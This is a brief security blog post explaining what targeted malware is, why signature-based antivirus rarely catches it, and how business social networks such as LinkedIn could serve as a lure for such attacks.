Targeted Malware

Targeted Malware has featured prominently in security news this week. To summarize, Targeted Malware is just like other malware but attempts to distribute it are limited to a small group of people or even just a single person. For obvious reasons, it’s more likely to be used for espionage, political or industrial, rather than direct crime. It can be particularly effective as the email, web site or document used to trick the user into installing the Malware can be tailored to a very narrow area of interest, luring the user into a false sense of security.

The chances of Targeted Malware being detected by an antivirus package is also low. Antivirus software relies mainly on comparing code against a database of known malicious patterns. The Anti-Malware vendors build their databases from Malware they have either “trapped” themselves or that which has been sent to them by their clients. A targeted attack would almost certainly miss the vendor honey pots and because of its small distribution, the chances of it being reported by an end user are slight.

The Register has a good article about a recent targeted attack on Google. There is a video at the bottom of the article by F-Secure that gives further insight into Targeted Malware.

Whilst writing this blog entry, it sprang to mind that a good launch pad for this kind of attack could be a social network, in particular, business orientated ones such as Linkedin. It’s easy enough to build a false profile and it’s also simple to identify targets at say an organisation that you wanted to infiltrate. The Groups feature could be particularly useful as you can post links to external websites and documents which could be a source of Malware. As the end user has had to log in to the system and they are probably looking at a Group that is fairly specific to their job role, the chances are that they have a false sense of security and are maybe not as cautious as they usually would be.